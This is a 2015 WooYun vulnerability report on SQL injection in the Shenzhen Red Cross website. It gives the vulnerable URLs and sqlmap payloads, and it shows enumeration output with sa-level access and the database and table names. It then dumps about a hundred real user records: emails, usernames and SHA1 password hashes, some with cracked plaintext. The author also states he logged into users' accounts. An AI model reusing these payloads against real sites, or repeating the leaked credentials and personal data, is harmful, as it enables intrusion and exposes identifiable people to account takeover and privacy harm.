当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121479

漏洞标题:某市红十字会SQL注入 泄露大量重要信息

相关厂商:广东省信息安全测评中心

漏洞作者: 泪雨无魂

提交时间:2015-06-23 16:32

修复时间:2015-06-28 16:34

公开时间:2015-06-28 16:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-23: 细节已通知厂商并且等待厂商处理中
2015-06-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

深圳红十字会注入漏洞,爆出数据库 泄露网站重要信息。。。
注入链接1:http://www.szredcross.org.cn/Intro/Memorabilia.aspx?typeID=19
注入链接2:http://www.szredcross.org.cn/Intro/MemorabiliaInfo.aspx?typeID=19
检测发现是 SA 权限。。。。
废话少说,直接上代码吧。。

sqlmap identified the following injection points with a total of 0 HTTP(s) 
reque
sts:
---
Place: GET
Parameter: typeID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: typeID=19 AND 4930=4930
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING 
clause
    Payload: typeID=19 AND 5745=CONVERT(INT,(CHAR(58) CHAR(116) CHAR(110) 
CHAR(1
08) CHAR(58) (SELECT (CASE WHEN (5745=5745) THEN CHAR(49) ELSE CHAR(48) 
END)) CH
AR(58) CHAR(103) CHAR(120) CHAR(106) CHAR(58)))
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: typeID=19 AND 9653=(SELECT COUNT(*) FROM sysusers AS 
sys1,sysusers
AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS 
sys6,sysu
sers AS sys7)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: typeID=(SELECT CHAR(58) CHAR(116) CHAR(110) CHAR(108) CHAR
(58) (SEL
ECT (CASE WHEN (1227=1227) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) 
CHAR(103)
CHAR(120) CHAR(106) CHAR(58))
---
[17:11:11] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[17:11:11] [INFO] fetching database names
[17:11:11] [INFO] the SQL query used returns 6 entries
[17:11:11] [INFO] retrieved: master
[17:11:11] [INFO] retrieved: model
[17:11:11] [INFO] retrieved: msdb
[17:11:12] [INFO] retrieved: RedCrossWeb
[17:11:12] [INFO] retrieved: tempdb
[17:11:12] [INFO] retrieved: WebState
available databases [6]:
[*] master
[*] model
[*] msdb
[*] RedCrossWeb
[*] tempdb
[*] WebState
---
[17:11:40] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[17:11:40] [INFO] fetching current user
[17:11:40] [INFO] retrieved: sa
current user:    'sa'
[17:11:40] [WARNING] HTTP error codes detected during run:
---
[17:11:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[17:11:46] [INFO] fetching current database
[17:11:47] [INFO] retrieved: RedCrossWeb
current database:    'RedCrossWeb'
[17:11:47] [WARNING] HTTP error codes detected during run:
Database: RedCrossWeb
[117 tables]
+----------------------------------------+
| CurrencyTypeInfo                       |
| DataInfo                               |
| DataInfoList_VW                        |
| DataType                               |
| DiseasesList                           |
| DonationProject                        |
| DonationSearch                         |
| DonationSearchHistory                  |
| ExtendType                             |
| FUNDTEMP                               |
| GrassrootsDynamicInfo                  |
| GrassrootsInfo                         |
| H_WebMedicalUnitInfo                   |
| HospitalUserList_VW                    |
| Log                                    |
| NewsContent                            |
| NewsContentViewList_VW                 |
| NewsContent_VW                         |
| NewsModule                             |
| NewsRelation                           |
| NewsType                               |
| OrganizationDetailInfo                 |
| OrganizationInfo                       |
| P_Bulletin                             |
| P_Bulletin_VW                          |
| P_FAQ                                  |
| P_FAQType                              |
| P_Flash                                |
| P_FriendLink                           |
| P_Leaveword                            |
| P_LeavewordType                        |
| P_Leaveword_Type_VW                    |
| P_LoveList                             |
| P_ServiceNote                          |
| PolicyInfo                             |
| PolicyTypeInfo                         |
| ProvinceInfo                           |
| RDIntroduceContent                     |
| RDIntroduceType                        |
| RDProduceContent                       |
| RDProduceType                          |
| SYS_Module                             |
| SYS_ModuleAuditingRelation             |
| SYS_Module_Rights                      |
| SYS_OperateLog                         |
| SYS_Roles                              |
| SYS_UserInfo                           |
| SYS_UserLoginInfo                      |
| SYS_UserType                           |
| SYS_User_Role                          |
| SYS_WebColorControl                    |
| S_Module                               |
| S_ProvinceInfo                         |
| Sys_Dictionary                         |
| Sys_FlowPic                            |
| Sys_PicFlash                           |
| Sys_SystemControl                      |
| Sys_ThemePicture                       |
| V_ActivityRecord                       |
| V_ActivityServiceType_VW               |
| V_ApplyBackout                         |
| V_EmailDeliveryList                    |
| V_EmailReceiveList                     |
| V_JoinTeamsOfVolunteer_VW              |
| V_Membership                           |
| V_PayMoney                             |
| V_ServcieAreaRelation                  |
| V_ServiceArea                          |
| V_ServiceTeamExtend                    |
| V_ServiceTeam_VW                       |
| V_ServiceTime                          |
| V_ServiceTimeRelation                  |
| V_ServiceType                          |
| V_ServiceTypeRelation                  |
| V_ServiceType_VW                       |
| V_ServicesTeam                         |
| V_Topic                                |
| V_TopicReppy                           |
| V_UserInfoVolExtendServiceTeamInfo2_VW |
| V_UserInfoVolExtendServiceTeamInfo_VW  |
| V_UserInfoVolExtendServiceTeam_VW      |
| V_UserServiceTeamExtend                |
| V_VolExt_TeamApply_VW                  |
| V_VolExt_UserPayMoney_VW               |
| V_VolExt_User_VW                       |
| V_VolExt_VolAcRe_VW                    |
| V_VolTopic_LeaveWord_VW                |
| V_VolTopic_ReplyDetail_VW              |
| V_VolTopic_Reply_VW                    |
| V_Vol_Activity_VW                      |
| V_Vol_MainTeamCount_VW                 |
| V_Vol_MyActivity_VW                    |
| V_VolunteerActivity                    |
| V_VolunteerActivityObject              |
| V_VolunteerActivityRelation            |
| V_VolunteerActivity_VW                 |
| V_VolunteerAppAudit_VW                 |
| V_VolunteerBloodType                   |
| V_VolunteerInfo                        |
| V_VolunteerInfo_Extend_ServiceTeam_VW  |
| V_VolunteerOfTeam_VW                   |
| V_VolunteerRole                        |
| V_VolunteerRoleRelation                |
| V_VolunteerRoleRelation_VW             |
| V_VolunteerServiceTeamExtend           |
| V_VolunteerTeamRelation                |
| V_Volunteer_Extend                     |
| Vol_Team_subTeam_VW                    |
| WebLocalSearch_VW                      |
| Web_StudentInfo                        |
| X5_X5520                               |
| X_4858                                 |
| X_6637                                 |
| X_7457                                 |
| X_8062                                 |
| comd_list                              |
| foofoofoo                              |
+----------------------------------------+
Database: RedCrossWeb
Table: SYS_UserInfo
[17 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| Answer       | varchar  |
| BoolDisable  | bit      |
| Contment     | varchar  |
| CreateDate   | datetime |
| Email        | varchar  |
| Gender       | bit      |
| ID           | int      |
| NickName     | varchar  |
| Phone        | varchar  |
| Question     | varchar  |
| RelationID   | int      |
| UnitAddress  | varchar  |
| UnitContact  | varchar  |
| UnitName     | varchar  |
| UserName     | varchar  |
| UserPassword | varchar  |
| UserType     | int      |
+--------------+----------+


1.png

2.png

3.png

4.png

6.png

漏洞证明:

证明如下。。。

8.png

5.png

8.png

9.jpg

9.png


尝试登陆一些用户的账号 发现确实是可以登陆的。。。

9.jpg


以下是一些数据。。。。

[238 entries]
+---------+----------------------+------------+------------------------------------------------------+
| Phone   | Email                | UserName   | UserPassword                                         |
+---------+----------------------+------------+------------------------------------------------------+
| <blank> | 1026263019@qq.com    | Zdp103019  | 79A38DC37362D8B1CC4108B72B8D85A2D216635B (Zdp103019) |
| <blank> | 103491814@QQ.com     | 张艳华        | 384D9BF25A1FB84330A4B04698AA82A93A2608C9             |
| <blank> | 104861671@qq.com     | 李靓         | 2B1D998790E5A8AB1CCCB29BADFCB6E6563E9441             |
| NULL    | 1093703412@qq.com    | 姐妹花        | 4F6F2488DF1FA113601E66C909AABFDED0DFC03D             |
| <blank> | 1094339639@qq.com    | qazcgm     | 6BD8515D94DBD72D9EA3F773DB1B2FA4636565A9             |
| <blank> | 1140251691@qq.com    | 红艳         | 03943410C73D3668F9DC712310AED5F263ECDF08             |
| <blank> | 1169717847@qq.com    | 阿牛22       | 58A792F9B77D765EC2B081F1AFAF31D2C9888BF6             |
| <blank> | 117236976@qq.com     | 小帆         | 7C4A8D09CA3762AF61E59520943DC26494F8941B (123456)    |
| <blank> | 1173498127@qq.com    | 朱萍         | 2E9548F8F5CB4549A2AFF70F0C67D1B9285E0804             |
| <blank> | 118023046@qq.com     | 118023046  | 7C4A8D09CA3762AF61E59520943DC26494F8941B (123456)    |
| NULL    | 1207048828@qq.com    | liaoyuping | 59B51D2FB7AAFC3F202C343ED6142534FC200610             |
| <blank> | 121236141@qq.com     | Hx0607     | 82C784325D448B58EEEDE7A73D626ACFDB817615             |
| NULL    | 122596588@qq.com     | shiny      | 0E143FC480E6C0EBE6B2776344BEBCE5FA3A4E60             |
| <blank> | 1246224756@QQ.com    | coolxudan  | 4F901A5E3330CD898061661B9592F37E294DEE9D             |
| <blank> | 1269098082@qq.com    | 123479     | B92EBDE3DE68DE0E0F073B834C0DC95C0EB4EB17             |
| NULL    | 1277746511@qq.com    | 光绪         | 32E6C5C2AD23DB90AC331BD7A4995A9F50D1F892 (airplane)  |
| <blank> | 1312474531@qq.com    | 植瑞能        | 2435FFE718B1A45742F70673AE202EA0524BB5E0 (135246)    |
| <blank> | 13266600393@163.com  | hugh.liu   | 122834722A488B65D692AB34DBE141C84E41CCC2             |
| NULL    | 1328989508@qq.com    | 林献凤        | 2F2A496DF03CF96577A624B8DD927C89E5DED8C2             |
| <blank> | 1329149214@qq.com    | xujing     | 7C4A8D09CA3762AF61E59520943DC26494F8941B (123456)    |
| NULL    | 13424282840@163.com  | pop9100    | 871EA75839F0B37C14C8145233CBD607F8B713F7             |
| NULL    | 135101305872139.com  | sophia     | 354DFF88F64FA3FCD1A20B202A4CC9632F1F0804             |
| <blank> | 13510793500@139.com  | Grand0807  | 876A40737C28D55805BD0216A6F51B5768F24533             |
| NULL    | 13510867005@139.com  | 吴春玲        | 432112063FDF408D53771BA616EB418E5CA2A215             |
| NULL    | 13544748316@139.com  | 倪贵         | 6982DAE8BB04F3A02CB59E1040A0475AF146FE2F             |
| <blank> | 13602590411@139.com  | SZLIN9     | CADF3996635D675859D1ED9BCE0939CB4497226E             |
| NULL    | 13650308389@163.com  | miaoxin    | C83B7A89C1B63E42216E0FAFC337CF1C4B41C9FD             |
| NULL    | 13724215567@163.com  | simon67    | 157A13139EF2832A53E43C050F33DADCA13C7B1A             |
| <blank> | 137675302@qq.com     | evilHC     | 7C4A8D09CA3762AF61E59520943DC26494F8941B (123456)    |
| <blank> | 13923898298@139.com  | 阿童木晨       | 7A09D00AF686FF70C6307F4A452B390F0C53D45A             |
| <blank> | 13924645588@139.com  | 王春萍        | 98328D4A786532B21B3C9634B5C252F89AB5B353             |
| <blank> | 1446789171@QQ163.COM | 耿良华        | 1675F0843189A2DFF0771AC8F0264845B0CDAE91 (963852)    |
| <blank> | 1476888750@qq.com    | 任晓晓        | AD340E907B3721000F232D9A0E73976FAB5EAE01             |
| NULL    | 15013794208@163.com  | ayan       | 7AEB245805829B59BC764C09C61E14A74CB79FD0             |
| <blank> | 15183336@qq.com      | 榴莲的刺       | 8049E70C9383AB35C71E7D88D2672562F4420B7A             |
| <blank> | 152574220@qq.com     | 可可23       | 515470A0558419BD88335CD32934BE54D336F28A (110110)    |
| NULL    | 153427669QQ@.COM     | 付佳         | 70E235AF252B18655F2B71D4F26BB22E33FB7128             |
| NULL    | 1552002822@qq.com    | Kikyo      | EC1D122DD1509A41116208199A49AB398DE8D5B4             |
| NULL    | 156538004@qq.com     | Delores    | 367353E3E42ABB67AF1D5C6A086DBC5E31A951A5             |
| <blank> | 157801150@qq.com     | yinyiqi    | 57CA8012BD98FAEB0BF8AEAD244809C988854F90             |
| NULL    | 158008596@qq.com     | 碧海蓝天       | A1BAA202D18E63F0D93CD23DE11A1B53CD36E301             |
| <blank> | 15814047266@163.com  | 钟武腾        | 5825FE421FDC0B9CF34BC7D5CE5F53AB975B3944             |
| <blank> | 15875529014@139.com  | ay581234   | F18F057EA44A945A083A00E6FCC11637D186042D (456123)    |
| NULL    | 1591562319@qq.com    | 文静chen     | 405A780DA971BF6A362979528474D3955E420FEE             |
| <blank> | 15986743022@139.com  | hhp750117  | 2CA31148E6C2F9E76AE352102BC36D9E20AE850F             |
| <blank> | 15986846654@139.COM  | 花雅         | 522C68A00B5E4089FDF3DACAE6EC4B861F74C1D7             |
| NULL    | 1600032400@.@.COM    | 庄燕君        | 94627FE8BFE78EE5857842104D9137E84EB0FEDD             |
| NULL    | 1605674517@qq.com    | 袁欢         | F733C907EB63FCC935CAE9CE373072CF74E9E442             |
| <blank> | 17105755@qq.com      | carina88   | 48058E0C99BF7D689CE71C360699A14CE2F99774 (121212)    |
| <blank> | 171360161@qq.com     | Ally       | 05A1E3CDD1A116E05BC2371D7553D5C364FFD0E1             |
| <blank> | 172280193@qq.com     | 文殊         | A411A662114F350569D7C1424106A7DBB9A2D90B             |
| <blank> | 179906759@qq.com     | 王鸿林        | 69F2CB5BE0B9CF0DBE700F28621FE6AA4F68FAC9             |
| <blank> | 18031586@qq.com      | 田木果        | B24CBE58B66B5EB9D8ADDB2EE993C512BC2940A1             |
| NULL    | 18079726781@189.cn   | hhzyzdmj   | 7AC5F19D5D201B20577FAB551A3510B1747619C3 (hhzyzdmj)  |
| NULL    | 18118701590@189.cn   | zhangdong  | 9AD3E7F4CB911165859D6948AD7769DC78BDDAB7             |
| NULL    | 182007604@qq.com     | w4zhaoqi   | 80B030C5F4B691B2E9011E125FDB2E54D31AF1B8             |
| <blank> | 1835892085@qq.com    | 赖满坚        | DCCA011A167D62BD5A4298E39A62F675DF7EFBC3             |
| <blank> | 185130517@QQ.com     | 杨秋英        | 4998D91CB44BC720EE822CEE4AAB746BD81FA7D7             |
| NULL    | 1870082585@QQ。COM    | 潇潇547      | 135FFEBD5D58A5D6560B597F3099DC570627DEDD             |
| <blank> | 18734379@qq.com      | zyn8754    | 77546C06D0EFD486C35F0E9581F2C04F93C7E146             |
| NULL    | 18818809881@139.com  | 王晓宾        | 6B6462507714AA02CAE433AF2C9A929FB889EAD2             |
| <blank> | 18844746@qq.com      | kingyuki   | BBFF7CD730AF07DE97C2980AED803FB44C60DC98             |
| <blank> | 191092421@qq.com     | 么么         | E3DBC12591685BD444D5D7643802DE51EFDD94CB             |
| <blank> | 2031597@qq.com       | sunny      | 3BFF695CA772A197A5FBDA4591C12C0909D12FB4             |
| <blank> | 2032055962@qq.com    | 2032055962 | 46000D45016E21C7A00710339DBCBEE4AF26C42D (orange12)  |
| <blank> | 21158848@qq.com      | 韩燕         | 5514EB38654C4352B2F74578388CE31EEE6FE2A1             |
| <blank> | 2275504@hotmail.com  | ntbebe     | 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8 (password)  |
| <blank> | 228203866@qq.com     | piscesheep | 0D58E460E7F6B33EBBD17CE6494D172021A45B3C             |
| <blank> | 229070800@qq.com     | 张丽华        | D85EE08D34FE5B030A98EC3FA7581EA4B6D54049             |
| <blank> | 234513859@qq.com     | tina128    | 878298BEFF2707FD1E74A163C1120BE39DC85D58             |
| <blank> | 234513859@qqq.com    | ting1212   | 24F4682D9958EEEFA176E768058DDF3F90AD9AB5             |
| NULL    | 2420488099@qq.com    | 吴小虫        | 3482930BBF4BB4542B702373C2678EC51EB8FF5B             |
| <blank> | 243532132@qq.com     | 木易         | 56AB859EE2888D33461495C09B5169E2B555EEE7             |
| <blank> | 245301910@qq.com     | only       | CE9A89CE905F538109AAD8386801599C6776B64B             |
| <blank> | 25199154@QQ.COM      | 龙骑士        | A3A9D34FB9FCA4B00BFE81DC580AD8D9B0A45613             |
| <blank> | 252003153@qq.com     | nantaiyouj | BF70C55B46E0D3C19DA41A92A3AC2B5B9F2BAC39 (221989)    |
| <blank> | 25242625@qq.com      | 小白         | 3242A7A94FC42C8D95ED0EBC92E2075F48A4983C             |
| NULL    | 2547920235@qq.com    | T\\?b7沁雪   | 639B9E52EBE61DDABC4387233B0D68CA91CB5F18             |
| NULL    | 2560037@qq.com       | 沐寒而开       | 5CE528CBF630CBF7C35DF80F755F3B3D54E7A819             |
| <blank> | 258421745@qq.com     | ZRYAN      | C5AAD17F083CA09D9EE8FB930643FEE8B1CA24C4             |
| NULL    | 261922025@qq.com     | xiaoeagle  | 458ED342DC54BCB419D9721138D2D0203EB80951             |
| NULL    | 2633848797@qq.com    | helenchow  | 34E1455E6FFC68092067CA8E560AFD1A5EDD48E4             |
| <blank> | 269575226@163.com    | 志愿者2012    | 7C4A8D09CA3762AF61E59520943DC26494F8941B (123456)    |
| NULL    | 277242518@qq.com     | Alina      | 32F84B95F0962C5807386FD0A8EC98D374B8983D (090909)    |
| NULL    | 278119967@qq.com     | luyuqiu6   | 0F29FC19D7336476001BDF515C162974B7C2C527             |
| <blank> | 279802320@qq.com     | 吴亚林        | 9134B86BD526E19B880E7C3496D517A15F1B3886             |
| NULL    | 281322668@qq.com     | 刘永         | 2628AF34C15D7F7F94FCD30B4C853AAF5B1FE8B9             |
| <blank> | 283887966@qq.com     | yeoh1990   | 237010568618F9C7D677E85D58CD361F5C60C190 (635200)    |
| <blank> | 286079726@qq.com     | 童飞丽        | 39B768723B804B445AF8B1F9E80320EC494424A8             |
| <blank> | 2880502628@QQ.COM    | 亮仕达        | BA3784F65D96D63192A32155DD969719FE63D730 (198425)    |
| NULL    | 289852647@qq.com     | 289852647  | D30AFD521506D7D66C4A0954CC3948F16791EB05 (asdzxc)    |
| NULL    | 309067036@qq.com     | missok2006 | 24E45834201C45C2DAA5445C762D992E99812A3C (198419)    |
| <blank> | 309207768@qq.com     | 罗宇民        | D423DFFCB971CEA78CCA2F429DE91784281EECF6             |
| <blank> | 309266097@qq.com     | summer     | 79AE096DD55F92D2C814205AEC6078E5FA4B7026             |
| <blank> | 314914429@qq.com     | celineee   | 2DBFAC57E2ADE919E3E69C6B130A1B892BAF49DD             |
| <blank> | 316034111@qq.com     | 小寅         | 6A66068844F668CAB1C640A95A87A31A02B80E5A             |
| <blank> | 326673511@qq.com     | 326673511  | FFD33FD6F381DA8870804A16F1F937072F0AEE05             |
| NULL    | 327999765@qq.COM     | 深圳联羽球会     | 5DFF8D7119E40568B3ED529BB19FB12A29391911             |


6666.。。。

修复方案:

你们知道。。。

版权声明:转载请注明来源 泪雨无魂@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-28 16:34

厂商回复:

最新状态:

暂无